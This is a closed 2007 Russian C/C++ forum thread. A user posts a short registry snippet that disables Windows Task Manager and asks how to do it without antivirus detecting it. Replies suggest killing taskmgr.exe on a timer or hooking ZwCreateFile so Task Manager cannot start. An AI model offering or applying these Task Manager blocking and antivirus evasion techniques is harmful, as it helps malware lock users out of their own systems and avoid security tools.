Незаметный доступ к реестру

Тема в разделе "Общие вопросы по С и С++", создана пользователем Zalman, 20 май 2007.

Статус темы:
Закрыта.
  1. Zalman

Zalman Гость

Имеется код:
    {
    TRegistry *Registry = new TRegistry;
    Registry->RootKey = HKEY_CURRENT_USER;
    AnsiString Way="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System";
    Registry->OpenKey(Way, True);
    Registry->WriteString("DisableTaskMgr", "1"); //блокирует
    Registry->CloseKey();
    delete Registry;
    }
    Он отключает диспетчер задач, при этом лезет в реестр. Проблема в том, что антивирус сообщает о подозрительном действии программы, и предлагает завершить ее. В общем проблема в том, что антивирус видит наши действия. Нужно незаметно для всякого рода защиты пробраться в реестр. Только как?

2. LAW

LAW Гость

Скорее всего никак. В Авире санкционированный хук в виндовом ядре.

3. Anton Chik

Anton Chik Гость

злобный совет: сидеть притаившись и ждать пока юзер допустит оплошность и комп попадет в состояние с отключенной защитой... в этот момент выпрыгиваем из кустов и делаем все свои черные дела)))

4. zubr

zubr Гость

Задача в общем то не сложная. Не обязательно таскменеджер отключать из реестра. Мне видится 2 решения:
    1. Более тупое и простое. Через определенные интервалы времени получать список процессов - и если появился taskmgr.exe делать ему Terminate.
    2. Более красивое решение. Перехватывать функцию ZwCreateFile, как только в пути к файлу будет taskmgr.exe, не передавать управление в оригинальную функцию. В результате у нас вообще не будет таскменеджер вызываться.

5. 62316e

62316e Гость

Для: zubr
    Точно не знаю, но мне почему кажется что это по сложности тоже что и перехватывать вызовы доступа к реестру... или?

6. zubr

zubr Гость

По сложности, да. Но что толку в данном случае перехватывать вызова доступа к реестру? Ну перехватили, все равно из своей функции, но в реестр придется прописать необходимое значение ключа - вот тут то антивирус и выскочит.

7. alekssgor

alekssgor Well-Known Member

Симпатии:
    0
    Не пойму тема чтоли старенькая совсем? У меня в XP ServesPack 3 раздела System вообще нету?

Загрузка...
Статус темы:
Закрыта.

Поделиться этой страницей